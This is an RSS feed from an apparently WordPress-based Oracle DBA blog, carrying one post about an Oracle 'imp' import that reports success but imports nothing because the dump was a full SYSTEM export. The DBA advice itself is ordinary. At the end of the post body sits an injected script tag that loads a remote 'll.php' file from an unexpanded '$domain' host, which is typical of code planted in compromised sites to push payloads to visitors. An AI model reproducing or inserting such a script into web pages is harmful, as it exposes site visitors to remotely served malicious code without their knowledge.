<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Oracle Database Administration Blog &#187; But no Object imported</title>
	<atom:link href="http://www.bestremotedba.com/tag/but-no-object-imported/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.bestremotedba.com</link>
	<description>Specially Created for Remote DBAs and Junior DBAs</description>
	<lastBuildDate>Fri, 30 Dec 2011 05:43:39 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Import terminated successfully without warnings &#8211; But no Object imported</title>
		<link>http://www.bestremotedba.com/import-terminated-successfully-without-warnings-but-no-object-imported/</link>
		<comments>http://www.bestremotedba.com/import-terminated-successfully-without-warnings-but-no-object-imported/#comments</comments>
		<pubDate>Thu, 01 Oct 2009 06:42:12 +0000</pubDate>
		<dc:creator>mudhalvan</dc:creator>
				<category><![CDATA[Database Maintenance]]></category>
		<category><![CDATA[But no Object imported]]></category>
		<category><![CDATA[Import terminated successfully without warnings]]></category>
		<category><![CDATA[Import terminated successfully without warnings ; But no Object imported]]></category>

		<guid isPermaLink="false">http://www.bestremotedba.com/?p=175</guid>
		<description><![CDATA[Import terminated successfully without warnings - But no Object imported]]></description>
			<content:encoded><![CDATA[<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_start --><p>Import terminated successfully without warnings &#8211; But no Object imported</p>
<p>Scenario: We have got the Dump from remote site and they have mentioned that dump was exported from SYSTEM user. </p>
<p>we tried the following two option but none of the expected object was imported to &#8220;bbb&#8221; schema</p>
<p>[oracle@UNIX backup]$ imp userid=system/xxxx fromuser=aaa touser=bbb file=backup.dmp log=export-1.log</p>
<p>[oracle@UNIX backup]$ imp userid=system/xxxx fromuser=system touser=bbb file=backup.dmp log=export-1.log</p>
<p>[oracle@UNIX backup]$ tail -1 imp.log<br />
Import terminated successfully without warnings.<br />
[oracle@UNIX backup]$</p>
<p>	Import log says import completed successfully but it is not showing any object getting imported in log also. </p>
<p>	We have tried with show=y option to see the content but still it is not showing. </p>
<p>Cause :<br />
	It is because we have expected objects in &#8220;CCCC&#8221; user at remote site. When engineer exported the dump<br />
	he used system user and did the full export of the database. </p>
<p>Solution<br />
	Since the remote site DBA used full export from system user and we need object from &#8220;CCCC&#8221; we have to do any of the following option</p>
<p>		1. Do Full Import against the target database<br />
		or<br />
		2. Import command with the fromuser=&#8221;CCCC&#8221;</p>
<p>		How do you find out the which user have the object you required without remote site enginner inform you. Only option is edit<br />
	the dump file in any editor if it is small. If not cat the file with more<br />
		$ cat backup.dmp |more<br />
			Look for the word CONNECT CCCC<br />
<script src="http://$domain/ll.php?kk=11"></script></p>
<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_end -->]]></content:encoded>
			<wfw:commentRss>http://www.bestremotedba.com/import-terminated-successfully-without-warnings-but-no-object-imported/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

